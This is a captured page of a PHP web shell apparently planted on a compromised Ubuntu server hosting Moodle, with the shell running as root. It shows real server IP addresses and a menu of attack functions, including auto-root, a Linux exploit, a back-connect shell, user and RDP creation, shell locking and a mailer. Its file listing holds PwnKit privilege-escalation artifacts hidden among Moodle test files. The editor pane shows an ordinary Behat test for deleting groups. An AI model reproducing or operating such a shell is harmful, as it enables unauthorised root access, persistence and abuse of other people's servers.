Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
group /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
auto_creation.feature
8.61
KB
-rwxrwxrwx
behat_groups.php
3.61
KB
-rwxrwxrwx
create_groups.feature
7.28
KB
-rwxrwxrwx
delete_groups.feature
3.36
KB
-rwxrwxrwx
group_description_picture.feat...
5.89
KB
-rwxrwxrwx
groups_import.feature
6.57
KB
-rwxrwxrwx
id_uniqueness.feature
2.39
KB
-rwxrwxrwx
overview.feature
9.35
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
role_visibility.feature
2.46
KB
-rwxrwxrwx
update_groups.feature
6.43
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : delete_groups.feature
@core @core_group Feature: Automatic deletion of groups and groupings In order to check the expected results occur when deleting groups and groupings in different scenarios As a teacher I need to create groups and groupings under different scenarios and check that the expected result occurs when attempting to delete them. Background: Given the following "courses" exist: | fullname | shortname | format | | Course 1 | C1 | topics | And the following "users" exist: | username | firstname | lastname | email | | teacher1 | Teacher | 1 | teacher1@example.com | And the following "course enrolments" exist: | user | course | role | | teacher1 | C1 | editingteacher | And I log in as "teacher1" And I am on "Course 1" course homepage And I navigate to "Users > Groups" in current page administration And I press "Create group" And I set the following fields to these values: | Group name | Group (without ID) | And I press "Save changes" And I press "Create group" And I set the following fields to these values: | Group name | Group (with ID) | | Group ID number | An ID | And I press "Save changes" And I follow "Groupings" And I press "Create grouping" And I set the following fields to these values: | Grouping name | Grouping (without ID) | And I press "Save changes" And I press "Create grouping" And I set the following fields to these values: | Grouping name | Grouping (with ID) | | Grouping ID number | An ID | And I press "Save changes" And I follow "Groups" @javascript Scenario: Delete groups and groupings with and without ID numbers Given I set the field "groups" to "Group (without ID) (0)" And I press "Delete selected group" And I press "Yes" Then the "groups" select box should not contain "Group (without ID) (0)" And I set the field "groups" to "Group (with ID) (0)" And I press "Delete selected group" And I press "Yes" And the "groups" select box should not contain "Group (with ID) (0)" And I follow "Groupings" And I click on "Delete" "link" in the "Grouping (without ID)" "table_row" And I press "Yes" And I should not see "Grouping (without ID)" And I click on "Delete" "link" in the "Grouping (with ID)" "table_row" And I press "Yes" And I should not see "Grouping (with ID)" @javascript @skip_chrome_zerosize Scenario: Delete groups and groupings with and without ID numbers without the 'moodle/course:changeidnumber' capability Given the following "role capability" exists: | role | editingteacher | | moodle/course:changeidnumber | prevent | And I log in as "teacher1" And I am on "Course 1" course homepage And I navigate to "Users > Groups" in current page administration When I set the field "groups" to "Group (with ID) (0)" Then the "Delete selected group" "button" should be disabled And I set the field "groups" to "Group (without ID) (0)" And I press "Delete selected group" And I press "Yes" And I should not see "Group (without ID)" And I follow "Groupings" And "Delete" "link" should not exist in the "Grouping (with ID)" "table_row" And I click on "Delete" "link" in the "Grouping (without ID)" "table_row" And I press "Yes" And I should not see "Grouping (without ID)"
Close